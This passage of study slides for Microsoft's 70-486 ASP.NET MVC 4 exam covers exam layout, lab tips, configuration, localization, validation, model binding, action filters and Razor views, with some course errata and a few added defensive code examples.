Microsoft
MCSD: 70-486: Developing
ASP.NET MVC 4 Web
Applications Courseware
Version 1.1
1. 1
Module 1
Exploring ASP.NET MVC 4
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
1. 2
70-486 Exam Guide to Ratio of Questions
[Chart of exam sections: Design and implement security; Design the application architecture; Troubleshoot and debug web applications; Design the user experience; Develop the user interface]
Developing ASP.NET MVC 4 Web Applications
http://www.microsoft.com/learning/en/us/exam.aspx?ID=70-486
June 2013: 155 minutes in total; 55 questions in total; 31 in main section; 3 case studies (6, 8, 10 questions)
Sep 2013 to Mar 2014: 155 minutes in total; 45 questions in total; 22 in main section; 3 case studies (6, 7, 10 questions)
Time not an issue
Just as much configuration and architecture as code
Official exam preparation guide does not give percentages for each section
Microsoft Exam 70-486 Study Guide
http://www.bloggedbychris.com/2012/11/06/microsoft-exam-70-486-study-guide/
1. 3
Estimate of Number of Exam Questions per Module
Module
Qs
1: Exploring ASP.NET MVC 4 & 2: Designing ASP.NET MVC 4 Web Applications
3: Developing ASP.NET MVC 4 Models
4: Developing ASP.NET MVC 4 Controllers
5: Developing ASP.NET MVC 4 Views
6: Testing and Debugging ASP.NET MVC 4 Web Applications
7: Structuring ASP.NET MVC 4 Web Applications
8: Applying Styles to ASP.NET MVC 4 Web Applications
9: Building Responsive Pages in ASP.NET MVC 4 Web Applications
10: Using JavaScript and jQuery for Responsive MVC 4 Web Applications
11: Controlling Access to ASP.NET MVC 4 Web Applications
12: Building a Resilient ASP.NET MVC 4 Web Application
13: Using Windows Azure Web Services in ASP.NET MVC 4 Web Applications
14: Implementing Web APIs in ASP.NET MVC 4 Web Applications
15: Handling Requests in ASP.NET MVC 4 Web Applications
16: Deploying ASP.NET MVC 4 Web Applications
Total questions in exam
45
1. 4
Labs
Follow the instructions at bottom of page 1-27 (position 3, 11014)
Allow NuGet to download missing packages during build
Database for labs 3 to 16 (e.g. position 5, 9295)
The labs tell you to use a Windows Azure SQL Database
Use this server in the connection string instead
Data Source=(localdb)\v11.0
Lab 1: Web Sites are different from Projects
1. 5
Lab 3 (position 5, 7923)
Use the Basic project template NOT the
Empty project template so that you get
Bundle configuration
jQuery libraries for the client-side validation
Shared views for layout
1. 6
Lab 3 (position 5, 8970)
Installing EntityFramework NuGet package
The latest NuGet package for EntityFramework is 6.0.1
Scaffolding in Visual Studio 2012 RTM is not compatible with it!
To install an older version, use the Package Manager Console
install-package EntityFramework -version 5.0.0.0
1. 7
Notes
The 70-486 exam is the hardest because it could ask a
question about almost any technology
ADO.NET, Entity Framework, LINQ, JavaScript, jQuery, CSS3,
WCF, Web API, Windows Azure, web architecture, Microsoft
Excel features, and so on
BUT the core of the exam is about ASP.NET MVC 4
In ASP.NET ~ (tilde) means root of web application
For Real-World Prototyping/Intranets (not on exam)
1. 8
ASP.NET Dynamic Data Entities Web Application
An old technology based on Web Forms for building
intranet applications as a client to a database
ASP.NET Dynamic Data Entities Web Application
Add an ADO.NET Entity Data Model
Delete the two .tt files (these create a class that derives from
DbContext that is not compatible with Dynamic Data)
Set Code Generation Strategy to Default (this creates a class
that derives from ObjectContext that is compatible)
In Global.asax, in RegisterRoutes method, uncomment and
modify the statement to register your ObjectContext class and
scaffold all tables
DefaultModel.RegisterContext(typeof(NorthwindEntities),
new ContextConfiguration() { ScaffoldAllTables = true });
Run the web application!
2. 1
Module 2
Designing ASP.NET MVC 4
Web Applications
Designing ASP.NET MVC 4 Web Applications
2. 2
Contents
Topic
Slide
MVC Architecture
Configuration
Intrinsic Objects
.axd Files
10
Internationalization
11
Future Reading
18
Exam Topic: Plan the application layers
Plan data access
Plan for separation of concerns
Appropriate use of models, views, and controllers
Choose between client-side and server side processing
Design for scalability
Exam Topic: Plan and implement globalization and localization
Plan a localization strategy
Create and apply resources to UI including JavaScript resources
Set cultures
Create satellite resource assemblies
2. 3
MVC Architecture
[Diagram of the MVC architecture for a request to http://www.contoso.com/blog/edit/16. Elements shown: RouteTable; Controller with Action (note 1) and ActionResult; Model; View and Partial View; ViewBag, ViewData, TempData (note 2); Domain Model with partial classes and metadata; Data Repository with GetBlog(int), GetBlogs(), UpdateBlog(Blog); Entity Data Model (CSDL + .cs, MSL, SSDL) using the Data Mapper pattern; SQL Server]
Data Repository is a façade, often implemented as a service
Note 1: Uses ModelBinders to map incoming parameters
Note 2: Uses Session state to pass data beyond current request
2. 4
Configuration
Web Configuration Hierarchy
Visual Studio
Or Web Site
IIS
\Windows\Microsoft.NET\Framework64\v4.0.30319\Config
<system.web> <!-- ASP.NET -->
<system.webServer> <!-- IIS -->
IIS 7 or later is at: \Windows\System32\inetsrv\config\ApplicationHost.config
Configuration
2. 5
External Configuration Sources
A section can load settings from an external file
In Web.config
<configuration>
  <system.web>
    <compilation debug="true" />
    <pages configSource="pages.config" />
    <globalization culture="auto" />
  </system.web>
</configuration>
In pages.config
<pages enableSessionState="false">
  <namespaces>
  </namespaces>
</pages>
Why?
File-access security and permissions can be used to restrict
access to sections of configuration settings
Settings that are not used during application initialization (e.g.
connection strings) can be modified and reloaded without
requiring an application restart by using this attribute
<configSections>
<section name="pages" ... restartOnExternalChanges="false" />
Intrinsic Objects
2. 6
Using the ASP.NET Intrinsic Objects
HttpContext properties
Application, Cache, Session (dictionaries for storing state
beyond current request, either shared or only for user session)
Items (dictionary for storing state during current request)
TimeStamp, User (information about current request)
Request (everything sent from the browser e.g. cookies)
Response (everything sent to the browser e.g. cookies)
// inside a Controller
HttpContext.Cache.Clear(); // some need HttpContext prefix ...
Debug.WriteLine(Request.Browser.IsMobileDevice); // ... some don't
// inside a View or anywhere else
Debug.WriteLine(HttpContext.Current.Request.Browser.IsMobileDevice);
HttpContext Class
http://msdn.microsoft.com/en-us/library/system.web.httpcontext.aspx
Intrinsic Objects
2. 7
HttpContext and Some of Its Properties
Intrinsic Objects
2. 8
Using the ASP.NET Intrinsic Objects
Inside a Controller all the following are directly
available
HttpContext
Items: good for sharing state through pipeline e.g. HTTP
modules and HTTP handlers
Request
HTTP request as sent from the client (request headers, cookies,
client certificate, form and query string parameters, and so on)
Response
HTTP response sent from the server to the client (response
headers, cookies, and so on)
Session (store state for user session)
Intrinsic Objects
2. 9
Using the ASP.NET Intrinsic Objects on HttpContext
Even inside a Controller all the following need the
HttpContext prefix
HttpContext.Cache
Shared cache for a Web application
HttpContext.Application
Store shared state at application level
HttpContext.ApplicationInstance
Defines the methods, properties, and events that are common
to all application objects in an ASP.NET application
HttpApplication is the base class for applications that are
defined by the user in the Global.asax file
.axd Files
2. 10
What are They?
There are several virtual features of ASP.NET that use
the .axd file extension; they are not real files
WebResource.axd and ScriptResource.axd: load resources such
as JavaScript and JPEGs that have been embedded in
assemblies; an alternative is the newer bundling and
minification feature
Trace.axd: view the trace log for the last n requests; most
useful for Web Forms pages because they show ViewState and
page events
If we don't explicitly warn MVC not to route anything
with .axd in the path then it would try to find a
controller named Trace.axdController!
routes.IgnoreRoute("{resource}.axd/{*pathInfo}");
Internationalization
2. 11
What Is It?
Internationalization involves
Localizing the user interface (load any UI text from resource
assemblies) by setting the UICulture property of the thread
Globalizing the code (e.g. DateTime.Now.ToLongDateString())
by setting the Culture property of the thread
ISO defines codes for language-region
en-US: English (United States)
en-GB: English (United Kingdom)
NOT en-UK: MOC is wrong on page 2-13
fr-FR: French (France)
fr-CA: French (Canada)
uiCulture code can be neutral (language only)
ISO 3166-1-alpha-2 code
http://www.iso.org/iso/country_codes/iso_3166_code_lists/country_names_and_code_elements.htm
Internationalization
2. 12
Browser Requests Language Preference
Browser sends its preferred language(s) in header
Accept-Language = "Accept-Language" ":"
1#( language-range [ ";" "q" "=" qvalue ] )
language-range = ( ( 1*8ALPHA *( "-" 1*8ALPHA ) ) | "*" )
Each language-range MAY be given an associated quality value
which represents an estimate of the user's preference for the
languages specified by that range. The quality value defaults to
"q=1". For example,
Accept-Language: da, en-gb;q=0.8, en;q=0.7
would mean: I prefer Danish, but will accept British English
and other types of English.
14 Header Field Definitions
http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html
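The header grammar quoted above, worked through as an added example (not part of the courseware): a parser that treats Accept-Language as untrusted client input, drops anything that does not fit the language-range grammar, and resolves the request to one of the cultures the application actually ships resources for. The class names, the supported-culture list and the sample headers are constructed for illustration.

```csharp
using System;
using System.Collections.Generic;
using System.Globalization;
using System.Linq;
using System.Text.RegularExpressions;

public static class AcceptLanguage
{
    // language-range = ( 1*8ALPHA *( "-" 1*8ALPHA ) ) | "*"
    private static readonly Regex LanguageRange =
        new Regex(@"^(\*|[A-Za-z]{1,8}(-[A-Za-z]{1,8})*)\z");

    // Parses the header value into (range, q) pairs, highest q first.
    // Items that do not fit the grammar, or that carry q=0, are dropped.
    public static List<KeyValuePair<string, double>> Parse(string header)
    {
        var prefs = new List<KeyValuePair<string, double>>();
        if (string.IsNullOrWhiteSpace(header)) return prefs;

        foreach (string item in header.Split(','))
        {
            string[] parts = item.Split(';');
            string range = parts[0].Trim();
            if (!LanguageRange.IsMatch(range)) continue;

            double q = 1.0; // the quality value defaults to q=1
            if (parts.Length > 1)
            {
                string p = parts[1].Replace(" ", "");
                if (!p.StartsWith("q=", StringComparison.OrdinalIgnoreCase)) continue;
                if (!double.TryParse(p.Substring(2), NumberStyles.AllowDecimalPoint,
                        CultureInfo.InvariantCulture, out q)) continue;
                if (q > 1.0) continue; // qvalue is limited to 0..1
            }
            if (q > 0.0) prefs.Add(new KeyValuePair<string, double>(range, q));
        }
        // OrderByDescending is a stable sort, so equal q values keep header order
        return prefs.OrderByDescending(x => x.Value).ToList();
    }

    // Returns the first supported culture matched by the header, else the fallback.
    // A range matches a tag when they are equal, or when the range is a prefix
    // of the tag followed by "-" (so "en" matches "en-US" but not the reverse).
    public static string Choose(string header, string[] supported, string fallback)
    {
        foreach (var pref in Parse(header))
        {
            string range = pref.Key;
            if (range == "*") return fallback;
            foreach (string tag in supported)
            {
                if (tag.Equals(range, StringComparison.OrdinalIgnoreCase) ||
                    tag.StartsWith(range + "-", StringComparison.OrdinalIgnoreCase))
                    return tag;
            }
        }
        return fallback;
    }
}

public static class Program
{
    public static void Main()
    {
        // Constructed: cultures this hypothetical application has resources for
        string[] supported = { "en-US", "fr-FR", "fr-CA" };

        // Constructed sample headers, including one that does not fit the grammar
        string[] headers =
        {
            "da, en-gb;q=0.8, en;q=0.7",
            "fr-CA, fr;q=0.9",
            "fr;q=0.5, en;q=0.9",
            "xx_YY;q=2, not a language!!",
            ""
        };

        foreach (string h in headers)
        {
            Console.WriteLine("[{0}] -> {1}", h,
                AcceptLanguage.Choose(h, supported, "en-US"));
        }
    }
}
```

Resolving to a fixed list keeps a client-supplied header from selecting a culture the application was never tested with.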
Internationalization
2. 13
Internationalizing MVC
There are two localization strategies to incorporate
different languages and cultures in ASP.NET MVC
By dynamically loading resource strings in all views
By using different set of views for every language and locale
Create a class library with .resx files and load in views
ASP.NET MVC 3 Internationalization
http://afana.me/post/aspnet-mvc-internationalization.aspx
Internationalization
2. 14
RESX Files, Satellite Assemblies, and Thread Culture
Visual Studio assigns the ResXFileCodeGenerator
custom tool to .resx files (change to Public version)
This tool embeds the default resources in the main
assembly in the bin folder and creates sub-folders for
other languages and cultures
/bin/MvcApp1.dll: application code and default resources
/bin/fr/MvcApp1.resources.dll: French resources
/bin/fr-CA/MvcApp1.resources.dll: French-Canadian resources
Set globalization so that the thread executing the view
has correct Culture and UICulture properties set based
on the browser's Accept-Language header
<globalization uiCulture="auto" culture="auto"/>
2. 15
Internationalization
Loading from Resource Files
When you create resource files (.resx) a class is created
for you for each one and will automatically load the
localized string
/Models/SharedResources.resx (Default - Hello)
/Models/SharedResources.fr.resx (French - Bonjour)
/Models/SharedResources.fr-CA.resx (French Canadian - Bonjour Quebec)
In a View
@using MvcSite.Models
@SharedResources.Welcome
In Web.config in Views folder
<pages>
  <namespaces>
    <add namespace="MvcSite.Models" />
  </namespaces>
</pages>
Resx Files In App_GlobalResources
http://odetocode.com/Blogs/scott/archive/2009/07/16/resource-files-and-asp-net-mvc-projects.aspx
Internationalization
2. 16
Right-to-Left Languages
When writing web pages in Web Forms or MVC, the best
way to make text flow from right to left is to use the
dir (direction) attribute
When the value is set on the html tag the page displays
as a right-to-left page and a vertical scrollbar appears
on the left side
<html dir="rtl">
When the value is set on the body tag, frames and
captions do not inherit right-to-left direction
To override for individual controls, set dir for each
control to ltr
<table dir="ltr">
2. 17
Internationalization
Common Verbs in English, Spanish, French
en | es | fr | en | es | fr
accept | aceptar | accepter | open | abrir | ouvrir
break | romper | casser | close/shut | cerrar | fermer
buy | comprar | acheter | pay | pagar | payer
cancel | cancelar | annuler | put | poner | poser
change | cambiar | changer | read | leer | lire
count | contar | compter | reply | responder | répondre
cut | cortar | couper | send | enviar | envoyer
draw | dibujar | dessiner | start/begin | comenzar | commencer
explain | explicar | expliquer | translate | traducir | traduire
fill | llenar | remplir | turn off | apagar | éteindre
find | encontrar | trouver | turn on | encender | allumer
finish | terminar | terminer | use | utilizar/usar | utiliser
go | ir | aller | wait | esperar | attendre
make/do | hacer | faire | write | escribir | écrire
Future Reading
2. 18
ASP.NET MVC
Official Site for ASP.NET MVC
Tutorials, videos, samples, forum, books, open source
http://asp.net/mvc
Free MVC 4 Video Training from Pluralsight
http://www.asp.net/mvc/videos/pluralsight-building-applications-with-aspnet-mvc-4
Windows Azure Conference
http://channel9.msdn.com/Events/WindowsAzure/AzureConf2012
Blogs
Phil Haack, http://haacked.com/
Scott Hanselman, http://www.hanselman.com/
3. 1
Module 3
Developing ASP.NET MVC 4
Models
Developing ASP.NET MVC 4 Models
3. 2
Contents
Exam Topic: Design and implement MVC controllers and actions
Implement model binding
3. 3
MOC Errata
Page 03-8 (position 5, 2677)
The MOC says
[AttributeUsage(AttributeTargets.Field)]
It should have said
[AttributeUsage(
AttributeTargets.Field | AttributeTargets.Property)]
Page 03-14 (position 5, 4588)
To define a SqlClient connection string they should use (but
don't have to due to backwards compatibility)
Data Source instead of server
Initial Catalog instead of database
Integrated Security instead of trusted_connection
Persist Security Info instead of PersistSecurityInfo
3. 4
MVC Models
Metadata Annotations
System.ComponentModel
[Display(Name = "First Name")]
[DisplayName("First Name")]: used by label
(deprecated; use Display instead because it can be localized*)
[ReadOnly(true)]: make property read-only
System.Web.Mvc
[HiddenInput] public Guid ID { get; set; }
[HiddenInput]: invisible to user but posted with form
System.ComponentModel.DataAnnotations
[DisplayFormat(HtmlEncode = false, NullDisplayText = "Unpaid",
DataFormatString = "{0:c}", ConvertEmptyStringToNull = true,
ApplyFormatInEditMode = false)]
public decimal Salary { get; set; }
[ScaffoldColumn(false)] // will not be included at all
public decimal Salary { get; set; }
*DisplayAttribute.ResourceType Property
http://msdn.microsoft.com/en-us/library/system.componentmodel.dataannotations.displayattribute.resourcetype(v=vs.110).aspx
3. 5
MVC Models
Validation Metadata Annotations
ValidationAttribute is abstract base class
ErrorMessage (non-localized string)
ErrorMessageResourceType (e.g. Shared)
ErrorMessageResourceName (e.g. HW)
Derived classes
[DataType(DataType.Date)]
[Range(18, 65)]
[RegularExpression(@"\d+")]
[Required(AllowEmptyStrings=false)]
[StringLength(50)]
DataType enumeration
Custom, DateTime, Date, Time, Duration, PhoneNumber, Currency,
Text, Html, MultilineText, EmailAddress, Password, Url, ImageUrl
[StringLength(14, MinimumLength = 6,
ErrorMessage = "Password must be between 6 and 14 characters.")]
public string Password { get; set; }
MVC Models
3. 6
Custom Validation
Two techniques for custom validation
CustomValidationAttribute
Inherit from ValidationAttribute (see next slide)
Create a class with a static method
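public class MyValidator {
// method must be public static and return ValidationResult (System.ComponentModel.DataAnnotations)
public static ValidationResult CheckPassword(object value) {
return ValidationResult.Success; // if value is valid
}
}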
Apply attribute to a property on your model
[CustomValidation(typeof(MyValidator), "CheckPassword",
ErrorMessage = "Between 6 and 14 characters.")]
public string Password { get; set; }
MVC Models
3. 7
Custom Validation
[AttributeUsage(AttributeTargets.Field | AttributeTargets.Property,
AllowMultiple = false)]
public class ValidatePasswordLengthAttribute : ValidationAttribute
{ // public so they can be set with named parameters
public int MinimumCharacters { get; set; }
public int MaximumCharacters { get; set; }
public ValidatePasswordLengthAttribute(int minChars = 6) : base()
{
MinimumCharacters = minChars;
}
public override bool IsValid(object value)
{
var s = (value as string);
return ((s != null) && (s.Length >= MinimumCharacters)
&& (s.Length <= MaximumCharacters));
}
}
[ValidatePasswordLength(8, MaximumCharacters = 12)]
public string Password { get; set; }
MVC Models
3. 8
Using a Partial Class to Apply Metadata
If you auto-generate your model using a tool like an
Entity Data Model then you cannot apply attributes to
the code because you will lose them next time it
regenerates, so you must use a partial class with the
MetadataType attribute
[MetadataType(typeof(BlogMetadata))]
public partial class Blog
{
public class BlogMetadata
{ // only need to include properties that need attributes
[Required(ErrorMessage = "Title is required")]
public object Title { get; set; }
[Required(ErrorMessage = "Blog is required")]
public object Blog { get; set; }
}
}
MVC Models
3. 9
Model Binders
There are five model binders built-in to ASP.NET MVC
DefaultModelBinder (most commonly used)
HttpPostedFileBaseModelBinder
ByteArrayModelBinder
LinqBinaryModelBinder
CancellationTokenModelBinder
MVC Models
3. 10
DefaultModelBinder
Maps a browser request to a data object
Provides a concrete implementation of a model binder
Maps the following types to a browser request
Primitive types, such as String, Double, Decimal, or DateTime
Model classes, such as Person, Address, or Product
Collections, such as ICollection<T>, IList<T>, or
IDictionary<TKey, TValue>
MVC Models
3. 11
Custom Model Binders
Implement System.Web.Mvc.IModelBinder
using System.Web.Mvc;
public class FullnameModelBinder : IModelBinder {
public object BindModel(ControllerContext cc, ModelBindingContext mbc) {
// ModelBindingContext has ValueProvider to get parameters
var fullName = mbc.ValueProvider.GetValue("fullname");
dynamic parts = fullName.RawValue.ToString().Split(' ');
string firstName = parts[0];
string lastName = parts[1];
Splitting DateTime - Unit Testing ASP.NET MVC Custom Model Binders
http://www.hanselman.com/blog/SplittingDateTimeUnitTestingASPNETMVCCustomModelBinders.aspx
6 Tips for ASP.NET MVC Model Binding
http://odetocode.com/blogs/scott/archive/2009/04/27/6-tips-for-asp-net-mvc-model-binding.aspx
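The slide's binder indexes parts[1] directly, so a missing "fullname" field or a single-word value throws inside model binding. As an added example (not the courseware's code), here is a binder for the same field that treats the posted value as untrusted and reports problems through ModelState instead; the FullName model, the 100-character limit and the controller are assumptions made for the example, and it needs a reference to System.Web.Mvc in an MVC 4 project.

```csharp
using System;
using System.Web.Mvc;

// Hypothetical model for this example
public class FullName
{
    public string FirstName { get; set; }
    public string LastName { get; set; }
}

public class SafeFullNameModelBinder : IModelBinder
{
    private const string Key = "fullname"; // same request field as the slide
    private const int MaxLength = 100;     // assumed upper bound for the field

    public object BindModel(ControllerContext controllerContext,
                            ModelBindingContext bindingContext)
    {
        // GetValue returns null when the request has no such field
        ValueProviderResult posted = bindingContext.ValueProvider.GetValue(Key);
        if (posted == null)
        {
            return Fail(bindingContext, "Full name is required.");
        }

        // Keep the attempted value so the view can redisplay what was typed
        bindingContext.ModelState.SetModelValue(Key, posted);

        string raw = (posted.AttemptedValue ?? string.Empty).Trim();
        if (raw.Length == 0)
        {
            return Fail(bindingContext, "Full name is required.");
        }
        if (raw.Length > MaxLength)
        {
            return Fail(bindingContext, "Full name is too long.");
        }

        // Split on the first space only: everything after it is the last name
        int space = raw.IndexOf(' ');
        if (space < 0)
        {
            return Fail(bindingContext, "Enter a first name and a last name.");
        }

        return new FullName
        {
            FirstName = raw.Substring(0, space),
            LastName = raw.Substring(space + 1).Trim()
        };
    }

    // Records the error against the field and binds the argument to null
    private static object Fail(ModelBindingContext bindingContext, string message)
    {
        bindingContext.ModelState.AddModelError(Key, message);
        return null;
    }
}

// Hypothetical controller showing how the action consumes the binder
public class PersonController : Controller
{
    [HttpPost]
    public ActionResult Edit(
        [ModelBinder(typeof(SafeFullNameModelBinder))] FullName name)
    {
        if (!ModelState.IsValid || name == null)
        {
            return View(); // redisplay the form with the validation message
        }
        return Content(name.LastName + ", " + name.FirstName);
    }
}
```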
MVC Models
3. 12
Registering and Applying a Model Binder
In Global.asax
To replace the default model binder
ModelBinders.Binders.DefaultBinder = new FirebrandModelBinder();
To add or insert a new model binder for a specific type before
any existing model binders for that type
ModelBinders.Binders.Add(
typeof(Person), new PersonBinder());
public ActionResult Edit(Person p) { // Person arguments are now bound by PersonBinder
In a controller
To apply to a specific action argument
public ActionResult Edit(
[ModelBinder(typeof(FirstNameBinder))] string firstName,
[ModelBinder(typeof(AgeBinder))] int age) {
The Features and Foibles of ASP.NET MVC Model Binding
http://msdn.microsoft.com/en-us/magazine/hh781022.aspx
Entity Framework
3. 13
Database Initializers
System.Data.Entity has several initializers
CreateDatabaseIfNotExists<TContext>: will recreate and
optionally re-seed the database only if the database doesn't
exist
DropCreateDatabaseAlways<TContext>: will always recreate
and optionally re-seed the database the first time that a
context is used in the app domain
DropCreateDatabaseIfModelChanges<TContext>: will delete,
recreate, and optionally re-seed the database only if the model
has changed since the database was created
MigrateDatabaseToLatestVersion<TContext,
TMigrationsConfiguration>: will use Code First Migrations to
update the database to the latest version
For all, create a derived class and override the Seed method
Database.SetInitializer<TContext> Method
http://msdn.microsoft.com/en-us/library/gg679461(v=vs.113).aspx
Windows Azure SQL Database
3. 14
Create the Database
Windows Azure SQL Database
3. 15
Wait for Database to be Created
Windows Azure SQL Database
3. 16
Manage allowed IP addresses
Click ADD TO THE ALLOWED IP ADDRESSES
Windows Azure SQL Database
3. 17
Get the Connection String
Windows Azure SQL Database
3. 18
Manage the Database Structure and Data
4. 1
Module 4
Developing ASP.NET MVC 4
Controllers
4. 2
Developing ASP.NET MVC 4 Controllers
Contents
Topic
Slide
Action Filters
Passing Data to a View
ActionResult
Page 04-4
The MOC says
Photo firstPhoto = context.Photos.ToList()[0];
It should have said
Photo firstPhoto = context.Photos.FirstOrDefault();
Exam Topic: Design and implement MVC controllers and actions
Apply authorization attributes and global filters
Implement action behaviors
Implement action results
Exam Topic: Control application behavior by using MVC extensibility points
Implement MVC filters and controller factories
4. 3
Action Filters
Types of Action Filter
Action filters are custom attributes that provide a
declarative means to add pre-action and post-action
behavior to controller action methods
There are built-in filters like [Authorize], [AllowAnonymous],
[HandleError], and you can create custom ones
Authorization filters: Make security decisions about whether to execute an action method
Action filters: Wrap the action method execution
Result filters: Wrap the ActionResult
Exception filters: Execute if there is an unhandled exception thrown in the action method
4. 4
Action Filters
When Do They Trigger?
Authorization filter
Before an action is executed
Action filter
OnActionExecuting
OnActionExecuted
Result filter
OnResultExecuting
OnResultExecuted
[MyCustomActionFilter]
[MyCustomResultFilter]
public ActionResult Index()
{
// fetch model
return View(model);
}
// response is returned
Exception filter
Only when an unhandled exception happens
4. 5
Action Filters
Implement a Custom Filter
Inherit from ActionFilterAttribute, then override any of
the four methods you want to use
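public class MyCustomActionFilter : ActionFilterAttribute
{
public override void OnActionExecuting(ActionExecutingContext filterContext) { } // before action executes
public override void OnActionExecuted(ActionExecutedContext filterContext) { } // after action executes
public override void OnResultExecuting(ResultExecutingContext filterContext) { } // before results returned
public override void OnResultExecuted(ResultExecutedContext filterContext) { } // after results returned
}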
ActionFilterAttribute implements
IActionFilter: OnActionExecuting, OnActionExecuted
IResultFilter: OnResultExecuting, OnResultExecuted
ActionFilterAttribute inherits from FilterAttribute
Warning! Use System.Web.Mvc NOT System.Web.Http.Filters
using System.Web.Mvc;
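A custom filter built on those overrides, as an added example (not from the courseware): an audit filter that records who called which action, how long it took and what kind of result came back, using HttpContext.Items to carry state between the callbacks. The class name, the Items key and the log format are assumptions; it needs a reference to System.Web.Mvc in an MVC 4 project.

```csharp
using System;
using System.Diagnostics;
using System.Web.Mvc;

public class AuditActionFilter : ActionFilterAttribute
{
    // Hypothetical key used to carry the timer through the request pipeline
    private const string TimerKey = "__AuditActionFilter.Timer";

    public override void OnActionExecuting(ActionExecutingContext filterContext)
    {
        // Child actions (Html.Action / Html.RenderAction) run inside the parent
        // request; skip them so they do not overwrite the parent's timer
        if (filterContext.IsChildAction) return;
        filterContext.HttpContext.Items[TimerKey] = Stopwatch.StartNew();
    }

    public override void OnActionExecuted(ActionExecutedContext filterContext)
    {
        if (filterContext.IsChildAction) return;
        if (filterContext.Exception != null && !filterContext.ExceptionHandled)
        {
            // Log the exception type only; messages may contain request data
            Trace.TraceWarning("audit user={0} action={1}/{2} exception={3}",
                UserName(filterContext),
                Clean(filterContext.ActionDescriptor.ControllerDescriptor.ControllerName),
                Clean(filterContext.ActionDescriptor.ActionName),
                filterContext.Exception.GetType().Name);
        }
    }

    public override void OnResultExecuted(ResultExecutedContext filterContext)
    {
        if (filterContext.IsChildAction) return;

        var timer = filterContext.HttpContext.Items[TimerKey] as Stopwatch;
        long elapsed = timer != null ? timer.ElapsedMilliseconds : -1;
        string result = filterContext.Result != null
            ? filterContext.Result.GetType().Name
            : "(none)";

        Trace.TraceInformation("audit user={0} action={1}/{2} result={3} ms={4}",
            UserName(filterContext),
            Clean(Convert.ToString(filterContext.RouteData.Values["controller"])),
            Clean(Convert.ToString(filterContext.RouteData.Values["action"])),
            result,
            elapsed);
    }

    private static string UserName(ControllerContext context)
    {
        var user = context.HttpContext.User;
        return (user != null && user.Identity != null && user.Identity.IsAuthenticated)
            ? Clean(user.Identity.Name)
            : "(anonymous)";
    }

    // Route values and user names come from the request: strip line breaks
    // so one request cannot forge additional log lines
    private static string Clean(string value)
    {
        return (value ?? string.Empty).Replace("\r", " ").Replace("\n", " ");
    }
}

// Apply to one action or controller with [AuditActionFilter], or to every
// action by registering it as a global filter in App_Start/FilterConfig.cs:
//   filters.Add(new AuditActionFilter());
```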
Passing Data to a View
4. 6
ViewBag
ViewData is a dictionary of objects that is derived from
ViewDataDictionary and accessible using strings as keys
ViewData["Message"] = "Hello world!";
ViewBag is a dynamic property that takes advantage of
the new dynamic features in C# 4.0 and later
ViewBag.Message = "Hello world!";
TempData is a dictionary that stores values in Session
(by default*) and persists until the next request
Anything you put into TempData is discarded after the next
request completes, for example, a redirect
What is ViewData, ViewBag and TempData?
http://www.codeproject.com/Articles/476967/WhatplusisplusViewData-2cplusViewBagplusandplusTem
*ASP.NET MVC: Do You Know Where Your TempData Is?
http://www.gregshackles.com/2010/07/asp-net-mvc-do-you-know-where-your-tempdata-is/
4. 7
ActionResult
Derived Types and Helper Methods of Controller
Derived Type: Description
ContentResult: Returns a user-defined content type
public ActionResult GetPlainText() {
return Content("Hello world");
}
EmptyResult: Returns a null result
FileResult: Returns a binary file
JavaScriptResult: Returns JavaScript
JsonResult: Returns a serialized Json object
public ActionResult GetJsonObject() {
return Json(new { firstName="Bob", age=42 },
JsonRequestBehavior.AllowGet);
}
PartialViewResult: Renders a partial view
RedirectResult: Redirects to another action method by using its URL
RedirectToRouteResult: Redirects to another action method
ViewResult: Renders a .cshtml or .aspx view
return View();
5. 1
Module 5
Developing ASP.NET MVC 4
Views
Developing ASP.NET MVC 4 Views
5. 2
Contents
Exam Topic: Compose the UI layout of an application
Implement partials for reuse in different areas of the application
Design and implement pages by using Razor templates (Razor view engine)
Exam Topic: Plan for search engine optimization and accessibility
Use analytical tools to parse HTML
View and evaluate conceptual structure by using plugs-in for browsers
Write semantic markup (HTML5 and ARIA) for accessibility, for example, screen readers
C# Razor Syntax Quick Reference
http://haacked.com/archive/2011/01/06/razor-syntax-quick-reference.aspx
5. 3
MOC Errata
Page 05-32
Task 3: Complete the photo gallery partial view.
6. After the if statement, add a P element, and call the
@Html.DisplayFor helper to render the words Created By:
followed by the value of the item.UserName property.
7. After the UserName display controls, add a P element, and call
the @Html.DisplayFor helper to render the words Created On:
followed by the value of the item.CreatedDate property.
It should say DisplayNameFor
MVC Views
5. 4
Highlighting Razor Code
Make it easier to spot razor code
Menu: Tools-Options
Environment-Fonts and Colors
Display items: Razor Code
Item background: choose a more visible colour than light grey
5. 5
MVC Views
What is the Model?
In a strongly-typed view, the Model object will be of
the type specified by @model directive
Which should match the type of object passed to View() helper
@model MvcApp.Models.Blog
@Model.Title
Html helper methods take a lambda which allows you
to declare a local variable name for the Model
Visual Studio uses model for the name by default
Inside for loops, lambda variables (like x below) still refer to
the model for the view; we must use the loop variable instead
@model MvcApp.Models.Customer
@Html.DisplayFor(model => model.CompanyName) has @Model.Orders.Count orders.
@foreach (var order in Model.Orders)
@Html.DisplayFor(x => order.OrderID)
MVC Views
5. 6
Feature with Models in Views
When using DisplayNameFor with IEnumerable models,
the lambda local variable still uses a single instance
With DisplayFor, model is
IEnumerable<Customer>
With DisplayNameFor, model is
a single Customer
The lab views sometimes
use this feature to
simplify lambdas
With DisplayFor, we have to
use item, NOT modelItem
In DisplayNameFor, we can
use model
5. 7
MVC Views
Importing Namespaces into Views
For all views, edit Web.config in Views folder
<system.web.webPages.razor>
<pages pageBaseType="System.Web.Mvc.WebViewPage">
<namespaces>
<add namespace="System.Web.Mvc" />
<add namespace="System.Web.Mvc.Ajax" />
<add namespace="System.Web.Mvc.Html" />
<add namespace="System.Web.Optimization"/>
<add namespace="System.Web.Routing" />
For a single view, add using directive at top of file
@using MvcApp.Models
@model Shipper
5. 8
MVC Views
Displayers and Editors
Visual Studio tools create code to output strings for
displaying or text boxes and validation for creating or
editing
<div>ProductID</div>
<div>@Model.ProductID</div>
@Html.LabelFor(m => m.ProductID)
@Html.TextBoxFor(m => m.ProductID)
@Html.ValidationMessageFor(m => m.ProductID)
You can change this to use DisplayFor and EditorFor
These can read the metadata in your model for hints for how to
output your data
[DisplayFormat(DataFormatString="{0:c}")]
public decimal Salary { get; set; }
@Html.DisplayFor(model => model.Salary)
@Html.EditorFor(model => model.Email)
5. 9
MVC Views
Defining Custom Displayers
By default, properties are rendered as strings
Order.OrderDate 08-02-2011 16:44
Customer.Email fred@test.com
Create a custom display by adding a partial view named
